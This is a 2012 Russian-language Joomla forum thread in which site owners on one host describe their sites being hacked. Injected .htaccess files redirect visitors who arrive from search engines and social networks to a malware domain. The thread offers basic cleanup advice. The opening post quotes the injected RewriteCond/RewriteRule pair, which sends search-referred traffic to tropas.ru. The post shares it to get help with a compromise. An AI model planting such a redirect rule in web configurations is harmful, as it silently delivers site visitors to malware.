Помогите определить степень угрозы

Discussion in 'Вопросы безопасности' started by Mazormedia, Mar 30, 2012.

  1. Offline

    Mazormedia Недавно здесь

    Joined:
    Mar 26, 2012
    Messages:
    6
    Likes Received:
    0
    Gender:
    Male
    Привет знатокам

    Я в этом мало что понимаю, но кратко рассказываю суть:
    1. Сайты открываются и работают, однако, если перейти к ним по ссылке с других сайтов, социалок или через поиск, то вылетает редирект и Eset Smart Security ловит троян.
    2. Оказались все 20 сайтов на Joomla 1.5, 2.5 и форум PhpBB взломанными на моем хостинге Timeweb.
    3. Обнаружены .htaccess с редиректами типа:
    ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|)\.(.*)
    RewriteRule ^(.*)$ http://tropas.ru/in.cgi?4 [R=301,L]

    4. Удалил все эти файлы, восстановил их из бекапов.
    5. Утром все повторилось, обнаружил поврежденный файл .htaccess в корне хостинга (не сайта, а хостинга), а к нему еще какой-то .authfile - удалил оба, сменил пароль админа хостинга, подменил поврежденные файлы .htaccess в папках сайтов.
    6. Повторилось.


    Вопросы:
    1. Что происходит?
    2. Взломали мой аккаунт на хостинге, FTP или все это развивается на уровне сайтов?
    3. Как может файл htaccess появляться в корне хостинга, т.е. выше public_html, выше корня сайта, там, где я вижу все папки с сайтами?
    4. Что делать?
     
  2.  
  3. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    Конечно если заливают файлы в каталог хостинга виртуального,то открыт доступ к хостингу.
     
  4. Offline

    ovadimo Недавно здесь

    Joined:
    Oct 12, 2011
    Messages:
    1
    Likes Received:
    0
    Gender:
    Male
    У меня та же история. И что теперь делать?
     
  5. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    Смотреть логи хостинга и время создания файла
     
  6. Offline

    spawnsanya Недавно здесь

    Joined:
    Feb 18, 2011
    Messages:
    3
    Likes Received:
    0
    Gender:
    Male
    Аналогичная проблема, этот файл был изменен сегодня ночью. Смена паролей фтп может полностью избавиться от этой проблемы?
     
  7. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    spawnsanya,
    И хостер тот же?
     
  8. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    Ну еще проверить свой комп,авторов etc
     
  9. Offline

    spawnsanya Недавно здесь

    Joined:
    Feb 18, 2011
    Messages:
    3
    Likes Received:
    0
    Gender:
    Male
    ага тоже timeweb!!!
     
  10. Offline

    spawnsanya Недавно здесь

    Joined:
    Feb 18, 2011
    Messages:
    3
    Likes Received:
    0
    Gender:
    Male
    Эту проблему кто-нибудь решил???? у меня опять сменился файл
     
  11. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    Так не у каждого одинаковый случай. Стучи к хостеру. Ищи файлы созданные недавно в папке cgi-bin
     
  12. Offline

    Yagnenok Недавно здесь

    Joined:
    Jan 16, 2010
    Messages:
    1
    Likes Received:
    0
    Gender:
    Male
    я проверил проверь комп свежим антивирем, посмотрел фтп логи, удалил всех фтп пользователей, зачистил лишнее из htaccess, удалил все из папок tmp и cache. Пока все норм. Думаю троян сидит глубоко в системе, думаю переустановиться полностью систему.
     
  13. OlegK
    Offline

    OlegK Russian Joomla! Team Staff Member ⇒ Профи ⇐

    Joined:
    Jan 17, 2011
    Messages:
    7,812
    Likes Received:
    771
    Gender:
    Male
    cmd.exe netstat -anb
     

Share This Page

Loading...